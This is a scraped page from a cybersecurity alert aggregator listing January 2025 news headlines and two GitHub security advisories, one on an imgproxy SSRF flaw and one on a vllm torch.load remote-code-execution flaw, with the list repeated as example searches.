CyberAlerts

IT-Harvest Launches HarvestIQ.ai

Source: Dark Reading

January 27th, 2025 (5 months ago)

US freezes foreign aid, halting cybersecurity defense and policy funds for allies

Source: TheRegister

January 27th, 2025 (5 months ago)

A Threat Actor Claims to be Selling Military Service Council of Saudi Arabia

Description: A Threat Actor Claims to be Selling Military Service Council of Saudi Arabia

Source: DarkWebInformer

January 27th, 2025 (5 months ago)

DeepSeek halts new signups amid "large-scale" cyberattack

Description: Chinese AI platform DeepSeek has disabled registrations on it DeepSeek-V3 chat platform due to an ongoing "large-scale" cyberattack targeting its services. [...]

Source: BleepingComputer

January 27th, 2025 (5 months ago)

Crisis Simulations: A Top 2025 Concern for CISOs

Description: CISOs are planning to adjust their budgets this year to reflect their growing concerns for cybersecurity preparedness in the event of a cyberattack.

Source: Dark Reading

January 27th, 2025 (5 months ago)

Apple Fixes Zero-Day Flaw Exploited in Attacks Against iPhones

Description: Apple has released a series of security updates across its product ecosystem, addressing multiple vulnerabilities, including a zero-day flaw that has reportedly been exploited in the wild. The updates covering iOS, iPadOS, macOS, watchOS, tvOS, and visionOS, provide fixes for critical security issues that could allow privilege escalation, arbitrary code execution, and denial-of-service attacks. Actively … The post Apple Fixes Zero-Day Flaw Exploited in Attacks Against iPhones appeared first on CyberInsider.

Source: CyberInsider

January 27th, 2025 (5 months ago)

KINGSMAN INDIA Defaced the Websites of GOSRA ISLAMIA DAKHIL MADRASAH and GABTALI ALIM MADRASAH

Description: KINGSMAN INDIA Defaced the Websites of GOSRA ISLAMIA DAKHIL MADRASAH and GABTALI ALIM MADRASAH

Source: DarkWebInformer

January 27th, 2025 (5 months ago)

CVE-2025-24354

[github.com/imgproxy/imgproxy] imgproxy is vulnerable to SSRF against 0.0.0.0

Description: Summary Imgproxy does not block the 0.0.0.0 address, even with IMGPROXY_ALLOW_LOOPBACK_SOURCE_ADDRESSES set to false. This can expose services on the local host. Details imgproxy protects against SSRF against a loopback address with the following check (source): if !config.AllowLoopbackSourceAddresses && ip.IsLoopback() { return ErrSourceAddressNotAllowed } This check is insufficient to prevent accessing services on the local host, as services may receive traffic on 0.0.0.0. Go's IsLoopback (source) strictly follows the definition of loopback IPs beginning with 127. 0.0.0.0 is not blocked. References https://github.com/imgproxy/imgproxy/security/advisories/GHSA-j2hp-6m75-v4j4 https://nvd.nist.gov/vuln/detail/CVE-2025-24354 https://github.com/imgproxy/imgproxy/commit/3d4fed6842aa8930ec224d0ad75b0079b858e081 https://github.com/advisories/GHSA-j2hp-6m75-v4j4

CVSS: MEDIUM (5.3)

EPSS Score: 0.04%

Source: Github Advisory Database (Go)

January 27th, 2025 (5 months ago)

Bitwarden makes it harder to hack password vaults without MFA

Description: Open-source password manager Bitwarden is adding an extra layer of security for accounts that are not protected by two-factor authentication, requiring email verification before allowing access to accounts. [...]

Source: BleepingComputer

January 27th, 2025 (5 months ago)

CVE-2025-24357

[vllm] vllm: Malicious model to RCE by torch.load in hf_model_weights_iterator

Description: Description The vllm/model_executor/weight_utils.py implements hf_model_weights_iterator to load the model checkpoint, which is downloaded from huggingface. It use torch.load function and weights_only parameter is default value False. There is a security warning on https://pytorch.org/docs/stable/generated/torch.load.html, when torch.load load a malicious pickle data it will execute arbitrary code during unpickling. Impact This vulnerability can be exploited to execute arbitrary codes and OS commands in the victim machine who fetch the pretrained repo remotely. Note that most models now use the safetensors format, which is not vulnerable to this issue. References https://pytorch.org/docs/stable/generated/torch.load.html Fix: https://github.com/vllm-project/vllm/pull/12366 References https://github.com/vllm-project/vllm/security/advisories/GHSA-rh4j-5rhw-hr54 https://nvd.nist.gov/vuln/detail/CVE-2025-24357 https://github.com/vllm-project/vllm/pull/12366 https://github.com/vllm-project/vllm/commit/d3d6bb13fb62da3234addf6574922a4ec0513d04 https://github.com/vllm-project/vllm/releases/tag/v0.7.0 https://pytorch.org/docs/stable/generated/torch.load.html https://github.com/advisories/GHSA-rh4j-5rhw-hr54

CVSS: HIGH (7.5)

EPSS Score: 0.05%

Source: Github Advisory Database (PIP)

January 27th, 2025 (5 months ago)

Threat and Vulnerability Intelligence Database

Example Searches:

	IT-Harvest Launches HarvestIQ.ai Source: Dark Reading January 27th, 2025 (5 months ago)
	US freezes foreign aid, halting cybersecurity defense and policy funds for allies Source: TheRegister January 27th, 2025 (5 months ago)
	A Threat Actor Claims to be Selling Military Service Council of Saudi Arabia Description: A Threat Actor Claims to be Selling Military Service Council of Saudi Arabia Source: DarkWebInformer January 27th, 2025 (5 months ago)
	DeepSeek halts new signups amid "large-scale" cyberattack Description: Chinese AI platform DeepSeek has disabled registrations on it DeepSeek-V3 chat platform due to an ongoing "large-scale" cyberattack targeting its services. [...] Source: BleepingComputer January 27th, 2025 (5 months ago)
	Crisis Simulations: A Top 2025 Concern for CISOs Description: CISOs are planning to adjust their budgets this year to reflect their growing concerns for cybersecurity preparedness in the event of a cyberattack. Source: Dark Reading January 27th, 2025 (5 months ago)
	Apple Fixes Zero-Day Flaw Exploited in Attacks Against iPhones Description: Apple has released a series of security updates across its product ecosystem, addressing multiple vulnerabilities, including a zero-day flaw that has reportedly been exploited in the wild. The updates covering iOS, iPadOS, macOS, watchOS, tvOS, and visionOS, provide fixes for critical security issues that could allow privilege escalation, arbitrary code execution, and denial-of-service attacks. Actively … The post Apple Fixes Zero-Day Flaw Exploited in Attacks Against iPhones appeared first on CyberInsider. Source: CyberInsider January 27th, 2025 (5 months ago)
	KINGSMAN INDIA Defaced the Websites of GOSRA ISLAMIA DAKHIL MADRASAH and GABTALI ALIM MADRASAH Description: KINGSMAN INDIA Defaced the Websites of GOSRA ISLAMIA DAKHIL MADRASAH and GABTALI ALIM MADRASAH Source: DarkWebInformer January 27th, 2025 (5 months ago)
CVE-2025-24354	[github.com/imgproxy/imgproxy] imgproxy is vulnerable to SSRF against 0.0.0.0 Description: Summary Imgproxy does not block the 0.0.0.0 address, even with IMGPROXY_ALLOW_LOOPBACK_SOURCE_ADDRESSES set to false. This can expose services on the local host. Details imgproxy protects against SSRF against a loopback address with the following check (source): if !config.AllowLoopbackSourceAddresses && ip.IsLoopback() { return ErrSourceAddressNotAllowed } This check is insufficient to prevent accessing services on the local host, as services may receive traffic on 0.0.0.0. Go's IsLoopback (source) strictly follows the definition of loopback IPs beginning with 127. 0.0.0.0 is not blocked. References https://github.com/imgproxy/imgproxy/security/advisories/GHSA-j2hp-6m75-v4j4 https://nvd.nist.gov/vuln/detail/CVE-2025-24354 https://github.com/imgproxy/imgproxy/commit/3d4fed6842aa8930ec224d0ad75b0079b858e081 https://github.com/advisories/GHSA-j2hp-6m75-v4j4 CVSS: MEDIUM (5.3) EPSS Score: 0.04% Source: Github Advisory Database (Go) January 27th, 2025 (5 months ago)
	Bitwarden makes it harder to hack password vaults without MFA Description: Open-source password manager Bitwarden is adding an extra layer of security for accounts that are not protected by two-factor authentication, requiring email verification before allowing access to accounts. [...] Source: BleepingComputer January 27th, 2025 (5 months ago)
CVE-2025-24357	[vllm] vllm: Malicious model to RCE by torch.load in hf_model_weights_iterator Description: Description The vllm/model_executor/weight_utils.py implements hf_model_weights_iterator to load the model checkpoint, which is downloaded from huggingface. It use torch.load function and weights_only parameter is default value False. There is a security warning on https://pytorch.org/docs/stable/generated/torch.load.html, when torch.load load a malicious pickle data it will execute arbitrary code during unpickling. Impact This vulnerability can be exploited to execute arbitrary codes and OS commands in the victim machine who fetch the pretrained repo remotely. Note that most models now use the safetensors format, which is not vulnerable to this issue. References https://pytorch.org/docs/stable/generated/torch.load.html Fix: https://github.com/vllm-project/vllm/pull/12366 References https://github.com/vllm-project/vllm/security/advisories/GHSA-rh4j-5rhw-hr54 https://nvd.nist.gov/vuln/detail/CVE-2025-24357 https://github.com/vllm-project/vllm/pull/12366 https://github.com/vllm-project/vllm/commit/d3d6bb13fb62da3234addf6574922a4ec0513d04 https://github.com/vllm-project/vllm/releases/tag/v0.7.0 https://pytorch.org/docs/stable/generated/torch.load.html https://github.com/advisories/GHSA-rh4j-5rhw-hr54 CVSS: HIGH (7.5) EPSS Score: 0.05% Source: Github Advisory Database (PIP) January 27th, 2025 (5 months ago)